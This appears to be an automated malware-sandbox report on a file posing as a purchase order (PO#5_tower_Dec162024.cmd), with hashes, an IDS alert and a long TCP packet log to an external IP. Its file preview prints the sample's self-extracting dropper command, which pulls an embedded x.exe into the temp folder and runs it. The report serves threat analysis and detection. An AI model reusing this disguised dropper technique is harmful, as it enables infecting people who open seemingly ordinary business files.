Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................l.......7.......@....@.......................... ...................@..............................x&...`...........................m..................................................@................................text...(........................... ..`.itext.......0...................... ..`.data........@......."..............@....bss....t8...`.......@...................idata..x&.......(...@..............@....tls....4............h...................rdata...............h..............@..@.reloc...m.......n...j..............@..B.rsrc........`......................@..@....................................@..@................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.372384599312554
Encrypted:	false
SSDEEP:	6144:fFVfpi6ceLP/9skLmb0ayWWSPtaJG8nAge35OlMMhA2AX4WABlguNTiL:NV1QyWWI/glMM6kF7lq
MD5:	8958192ADFC39F943F9E5FC55D8BB151
SHA1:	B23E57B1D6BB5AC48D616D42D5DF6F59E4C2A082
SHA-256:	A7CECCA8D588323D44609CB6260EDA51300C16BB87DBD6A4598551EBC4ACC2A5
SHA-512:	2AFACBAB8B3209D7F4C7EEB83FDD25613368ABB8485EBF230777B574E012943D348BB338995297F440BBC77B6CBAE0F589B192CF21E4FA1D2F5D7AACB25A5F16
Malicious:	false
Preview:	regfC...C....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.^A-`[..............................................................................................................................................................................................................................................................................................................................................._V.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 4294967295 bytes, 1 file, at 0x75 +A "x.exe", number 1, 30 datablocks, 0 compression
Entropy (8bit):	7.035939451744328
TrID:	Microsoft Cabinet Archive (8008/1) 99.91% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.09%
File name:	PO#5_tower_Dec162024.cmd
File size:	954'235 bytes
MD5:	8ed519b7621506144f41033597388708
SHA1:	d1977995223392fb0d25a7c322d5da9e1157a568
SHA256:	b6f2833f88b702a8aba52760c0b55d799cda729a773172188abbf29a29da0f08
SHA512:	393753c2cdcf769c7a31a75de04f1bacaaf80e571fc152e36190823d573bb58df4928d20dc6839b867d59bb974ea4b3375a84e608f1eaeb5b18d189a398d8658
SSDEEP:	24576:F7sj9Kw0StOA48mAHp0Q2nDGjfPMh0hsITzNv:FQc9StTkofPMh0hsITzNv
TLSH:	DB159E32E1606932DD16C6FD1C72C6E868177C723F37EC97F6A02D58EA39A542C66183
File Content Preview:	MSCF............u...............................cls && extrac32 /y "%~f0" "%tmp%\x.exe" && start "" "%tmp%\x.exe".................. .x.exe.........MZP.....................@...............................................!..L.!..This program must be run und

File Icon


Icon Hash:	9686878b929a9886

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-31T09:44:13.766542+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49707	198.252.105.91	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 31, 2024 09:44:13.002496958 CET	49706	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:13.002549887 CET	443	49706	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:13.002660036 CET	49706	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:13.002798080 CET	49706	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:13.002840996 CET	443	49706	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:13.004271984 CET	49706	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:13.080470085 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:13.080508947 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:13.080601931 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:13.105950117 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:13.105966091 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:13.766433954 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:13.766541958 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:13.769886017 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:13.769906998 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:13.770189047 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:13.824688911 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:13.870204926 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:13.915330887 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.009006023 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.047363043 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.047378063 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.047481060 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.047513008 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.047528028 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.047544003 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.047549963 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.047559023 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.047568083 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.047576904 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.047597885 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.096993923 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.097004890 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.097033978 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.097047091 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.097078085 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.097090006 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.097117901 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.097142935 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.140132904 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.140161991 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.140225887 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.140240908 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.140280008 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.182897091 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.182918072 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.183007002 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.183027983 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.183072090 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.184355974 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.184372902 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.184427023 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.184433937 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.184467077 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.186204910 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.186222076 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.186285019 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.186290979 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.186326027 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.227173090 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.227195978 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.227308035 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.227346897 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.227391958 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.269711971 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.269731045 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.269802094 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.269835949 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.269851923 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.269880056 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.271488905 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.271505117 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.271583080 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.271595955 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.271631956 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.272979021 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.273008108 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.273037910 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.273053885 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.273066998 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.273083925 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.274836063 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.274852037 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.274908066 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.274924040 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.274960995 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.276221037 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.276238918 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.276292086 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.276303053 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.276343107 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.277518988 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.277535915 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.277590990 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.277607918 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.277643919 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.358189106 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.358220100 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.358335972 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.358359098 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.358403921 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.358781099 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.358798981 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.358855963 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.358863115 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.358899117 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.359463930 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.359482050 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.359534025 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.359541893 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.359577894 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.360172987 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.360196114 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.360244989 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.360250950 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.360290051 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.363532066 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.363555908 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.363590956 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.363601923 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.363632917 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.363734961 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.363754034 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.363805056 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.363812923 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.363852978 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.364104986 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.364121914 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.364161968 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.364168882 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.364207029 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.400609016 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.400635004 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.400747061 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.400789976 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.400839090 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.443042040 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.443067074 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.443176031 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.443196058 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.443238020 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.443516970 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.443543911 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.443598986 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.443607092 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.443639994 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.444072008 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.444092035 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.444138050 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.444144964 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.444181919 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.444787979 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.444808006 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.444858074 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.444864988 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.444907904 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.445262909 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.445286036 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.445327997 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.445339918 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.445373058 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.445823908 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.445844889 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.445904016 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.445910931 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.445945978 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.446455002 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.446471930 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.446535110 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.446542025 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.446579933 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.488037109 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.488065958 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.488174915 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.488190889 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.488241911 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.530030966 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.530062914 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.530194044 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.530216932 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.530263901 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.530580044 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.530608892 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.530663013 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.530669928 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.530710936 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.531393051 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.531415939 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.531464100 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.531471014 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.531493902 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.531514883 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.531898975 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.531918049 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.531991005 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.532021046 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.532066107 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.532602072 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.532624006 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.532681942 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.532690048 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.532736063 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.532774925 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.532793045 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.532851934 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.532857895 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.532916069 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.533740997 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.533762932 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.533814907 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.533823967 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.533860922 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.578675985 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.578711033 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.578843117 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.578882933 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.578937054 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.616980076 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.617013931 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.617239952 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.617255926 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.617315054 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.617621899 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.617645025 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.617705107 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.617712975 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.617783070 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.618436098 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.618458033 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.618494987 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.618504047 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.618526936 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.618550062 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.618716955 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.618732929 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.618783951 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.618791103 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.618834019 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.619703054 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.619721889 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.619772911 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.619781017 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.619821072 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.620414972 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.620433092 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.620485067 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.620488882 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.620503902 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.620537043 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.620552063 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.620557070 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.620609045 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.620640993 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.665425062 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.665447950 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.665512085 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.665543079 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.665560007 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.665581942 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.703901052 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.703923941 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.703999043 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.704034090 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.704077005 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.704499006 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.704518080 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.704571009 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.704580069 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.704631090 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.705224991 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.705241919 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.705293894 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.705303907 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.705338001 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.708709955 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.708728075 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.708755016 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.708782911 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.708797932 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.708856106 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.709281921 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.709301949 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.709357977 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.709373951 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.709417105 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.709933043 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.709952116 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.709999084 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.710011959 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.710024118 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.710026026 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.710053921 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.710088968 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.752839088 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.752871990 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.752939939 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.752959967 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.753002882 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.791918039 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.791945934 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.792042971 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.792063951 CET	443	49707	198.252.105.91	192.168.2.8
Dec 31, 2024 09:44:14.792107105 CET	49707	443	192.168.2.8	198.252.105.91
Dec 31, 2024 09:44:14.792443991 CET	443	49707	198.252.105.91	192.168.2.8
